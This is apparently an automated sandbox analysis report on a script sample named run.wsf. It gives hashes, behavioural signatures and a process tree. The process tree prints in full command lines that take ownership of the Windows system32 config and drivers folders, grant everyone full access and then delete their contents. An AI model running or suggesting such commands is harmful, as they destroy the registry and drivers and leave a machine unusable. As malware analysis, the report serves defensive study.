Analysis
-
max time kernel
54s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:19
Static task
static1
Behavioral task
behavioral1
Sample
run.wsf
Resource
win7-20240704-en
General
-
Target
run.wsf
-
Size
1KB
-
MD5
99fe84c9ee9bc7854959c3165e316326
-
SHA1
1571568802ba5b5673786920c59e78affd569104
-
SHA256
bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745
-
SHA512
8e626408da6547162fd5fa03c6d2965b584a0149729348c292d4ec7da84194f1688bd5342b30321bfdc9264566a9ed11262f5b44a9ba4d22ba57eaedd824f7e1
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 3660 takeown.exe 5004 takeown.exe 2160 icacls.exe 4892 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exepid process 4892 icacls.exe 3660 takeown.exe 5004 takeown.exe 2160 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
Notepad.exepid process 4956 Notepad.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 5004 takeown.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.execmd.execmd.exedescription pid process target process PID 3324 wrote to memory of 4712 3324 WScript.exe cmd.exe PID 3324 wrote to memory of 4712 3324 WScript.exe cmd.exe PID 3324 wrote to memory of 1788 3324 WScript.exe cmd.exe PID 3324 wrote to memory of 1788 3324 WScript.exe cmd.exe PID 4712 wrote to memory of 3660 4712 cmd.exe takeown.exe PID 4712 wrote to memory of 3660 4712 cmd.exe takeown.exe PID 1788 wrote to memory of 5004 1788 cmd.exe takeown.exe PID 1788 wrote to memory of 5004 1788 cmd.exe takeown.exe PID 4712 wrote to memory of 2160 4712 cmd.exe icacls.exe PID 4712 wrote to memory of 2160 4712 cmd.exe icacls.exe PID 1788 wrote to memory of 4892 1788 cmd.exe icacls.exe PID 1788 wrote to memory of 4892 1788 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"1⤵PID:1256
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4868
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3660
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4892
-
-
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\GetUninstall.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:4956
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\RestartBackup.vbs"1⤵PID:5052
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SaveUnpublish.vbs"1⤵PID:3768
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
57B
MD50fd6fb32bda4ebd6d5f4695335b1ad36
SHA15bf718741d02e633316ced147dbcf9d4d31e4200
SHA25673a3849e7141aac5569d2493129b00f6b833c7c16d87470c0557386b20215c8c
SHA512fde517c0ff84560900c86f37a4c33208862092902d83d2d6028b870bad6bb14fe139ea7fa2fa6e21da8cd29ed2bf2a5410eaf45e094882f72cdfde27d4a38696